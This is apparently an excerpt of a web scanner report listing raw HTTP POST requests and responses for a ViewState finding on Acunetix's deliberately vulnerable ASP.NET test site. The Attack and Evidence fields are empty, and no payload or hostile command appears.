Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8226&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDA7yEHYtoIZGRkzTPH0VnraJNu9nQd8BhhKRsZI%2Fk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLxnvKmBwK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ82s%2FuFvcZN0tx7laUkQLbopRbsxg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:18:00 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDA7yEHYtoIZGRkzTPH0VnraJNu9nQd8BhhKRsZI/k=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLxnvKmBwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q82s/uFvcZN0tx7laUkQLbopRbsxg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:White" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8230&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDAlssrZdoIZGRkOd%2Fs4%2FwbXiMoZ789DdJfV%2FL73bk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLYnoC5DgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2F3IbDEL5S%2FS9maUEfvZhxmg5lLtg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:29:41 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgDAlssrZdoIZGRkOd/s4/wbXiMoZ789DdJfV/L73bk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLYnoC5DgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/3IbDEL5S/S9maUEfvZhxmg5lLtg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:White" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
